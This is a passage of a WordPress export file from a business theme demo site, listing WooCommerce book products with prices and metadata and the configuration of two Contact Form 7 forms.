		<wp:post_date_gmt><![CDATA[2020-10-01 10:26:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[leadership-challenge]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="consulting"><![CDATA[Consulting]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1270]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Introduction to Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/introduction-to-marketing/</link>
		<pubDate>Thu, 01 Oct 2020 10:27:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1176</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1176</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:27:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:27:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[introduction-to-marketing]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="business"><![CDATA[Business]]></category>
		<category domain="product_visibility" nicename="featured"><![CDATA[featured]]></category>
		<category domain="product_cat" nicename="marketing"><![CDATA[Marketing]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[49.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[49.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1281]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Foundations of Business</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/foundations-of-business/</link>
		<pubDate>Thu, 01 Oct 2020 10:30:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1178</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1178</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:30:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:30:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[foundations-of-business]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="consulting"><![CDATA[Consulting]]></category>
		<category domain="product_visibility" nicename="featured"><![CDATA[featured]]></category>
		<category domain="product_cat" nicename="finance"><![CDATA[Finance]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[69.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[69.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1280]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Big Money</title>
		<link>http://wpdemo.archiwp.com/maxbizz/product/big-money/</link>
		<pubDate>Thu, 01 Oct 2020 10:32:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=product&#038;p=1180</guid>
		<description></description>
		<content:encoded><![CDATA[A good leader gets things done; a great leader aspires, inspires, and achieves more. This book highlights the differences between good and great, and shows you how to bridge the chasm between getting things done and making things happen.Business is evolving at an increasingly rapid rate, and leaders must keep pace with the changes or risk stagnation. People work differently, are motivated differently, and have different expectations today—business as usual is quickly losing its effectiveness. The Leadership Challenge helps you stay current, relevant, and effective in the modern workplace.
<ul>
 	<li>Gain deep insight into leadership's critical role in organizational health</li>
 	<li>Navigate the shift toward team-oriented work relationships</li>
 	<li>Motivate and inspire to break through the pervasive new cynicism</li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[This book is the gold-standard manual for effective leadership, grounded in research and written by the premier authorities in the field. With deep insight into the complex interpersonal dynamics of the workplace.

This new sixth edition has been revised to address current challenges, and includes more international examples and a laser focus on business issues; you'll learn how extraordinary leaders accomplish extraordinary things.]]></excerpt:encoded>
		<wp:post_id>1180</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:32:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:32:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[big-money]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[product]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="product_cat" nicename="business"><![CDATA[Business]]></category>
		<category domain="product_cat" nicename="finance"><![CDATA[Finance]]></category>
		<category domain="product_type" nicename="simple"><![CDATA[simple]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_regular_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[59.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[total_sales]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[taxable]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_tax_class]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_manage_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_backorders]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sold_individually]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_virtual]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_downloadable]]></wp:meta_key>
		<wp:meta_value><![CDATA[no]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_limit]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_download_expiry]]></wp:meta_key>
		<wp:meta_value><![CDATA[-1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_stock_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[instock]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_average_rating]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wc_review_count]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_product_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[4.5.2]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_sale_price]]></wp:meta_key>
		<wp:meta_value><![CDATA[39.99]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1279]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Main Contact</title>
		<link>http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=4</link>
		<pubDate>Thu, 03 Sep 2020 08:30:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=4</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>4</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 08:30:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 08:30:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Ready to Get Started?</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn">Send Message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=610</link>
		<pubDate>Wed, 09 Sep 2020 03:52:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=610</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>610</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:52:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:52:45]]></wp:post_date_gmt>
